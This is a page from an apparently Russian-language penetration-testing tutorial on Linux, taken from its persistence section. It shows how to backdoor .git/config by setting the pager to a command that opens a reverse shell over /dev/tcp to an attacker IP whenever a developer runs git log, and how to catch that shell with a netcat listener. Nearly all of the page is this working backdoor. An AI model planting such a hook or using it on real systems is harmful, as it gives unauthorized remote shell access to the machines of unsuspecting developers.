🍻
Linux under attack
  • ΠŸΡ€Π΅Π΄ΠΈΡΠ»ΠΎΠ²ΠΈΠ΅
  • ОглавлСниС
  • ΠžΠΊΡ€ΡƒΠΆΠ½ΠΈΠ΅
  • Recon
    • 00 - Info
    • 01 - ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ источники
  • SCAN
    • 00 - Info
    • 01 - Π‘ΠΊΠ°Π½ nmap
    • 02 - Π‘ΠΊΠ°Π½ срСдствами OC
    • 03 - ΠžΠ±Ρ„ΡƒΡΠΊΠ°Ρ†ΠΈΡ IP
    • 04 - Π‘ΠΊΠ°Π½ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ сайта
    • 05 - CΠΊΠ°Π½ ΠΏΠΎΠ΄Π΄ΠΎΠΌΠ΅Π½ΠΎΠ²
    • 06 - Π‘ΠΊΠ°Π½ WordPress
  • Vulnerability Analysis
    • 00 - Анализ
  • Exploitation
    • 00 - Info
    • 01 - BruteForce
    • 02 - Local Enumeration
  • Privilege Escalation
    • 00 -Info
    • 01 - Π›ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚Ρ‹
    • 02 - Crack hash
    • 03 - Misconfig
    • 04 - Kernel exploits
  • PERSISTENCE
    • 00 - info
    • 01 - SSH Keys
    • 02 - ПсСвдоROOT Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚
    • 03 - bashrc
    • 04 - Cron Jobs
    • 05 - Systemd
    • 06 - Systemd Timers
    • 07 - rc.local
    • 08 - MOTD
    • 09 - APT
    • 10 - Git hook
    • 11 - Git config
    • 12 - PAM backdoor
  • Π—Π°ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅
Powered by GitBook
On this page
  1. PERSISTENCE

11 - Git config

Previous10 - Git hookNext12 - PAM backdoor

Last updated 1 year ago

Π’ .git/config Π΅ΡΡ‚ΡŒ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Π΅ срСды, ΠΈΡ… ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΡΡ‚Ρ€ΠΎΠΈΡ‚ΡŒ Π½Π° Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ врСдоносных ΠΊΠΎΠΌΠ°Π½Π΄, ΠΊΠΎΠ³Π΄Π° Π΄ΠΎΠ»ΠΆΠ½ΠΎ ΠΏΡ€ΠΎΠΈΠ·ΠΎΠΉΡ‚ΠΈ ΠΊΠ°ΠΊΠΎΠ΅-Π»ΠΈΠ±ΠΎ дСйствиС. Для git log соотвСтствуСт пСрСмСнная срСды GIT_PAGER.

// ΠŸΡ€Π°Π²ΠΈΠΌ .git/config
pager = nohup bash -c 'bash -i >& /dev/tcp/192.168.140.128/9010 0>&1' > /dev/null 2>&1 & ${PAGER:-less}

// На Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅ΠΌ хостС ΠΏΠΎΠ΄Π½ΠΈΠΌΠ°Π΅ΠΌ netcat 
nc -vln 9010

Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ ΠΊΠΎΠ³Π΄Π° Ρ€Π°Π·Ρ€Π°ΠΎΡ‚Ρ‡ΠΈΠΊ Π²Ρ‹Π·ΠΎΠ²Π΅Ρ‚ git log, ΠΎΠ½ ΡƒΠ²ΠΈΠ΄ΠΈΡ‚ Π»ΠΎΠ³, Π° ΠΌΡ‹ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠΌ шСлл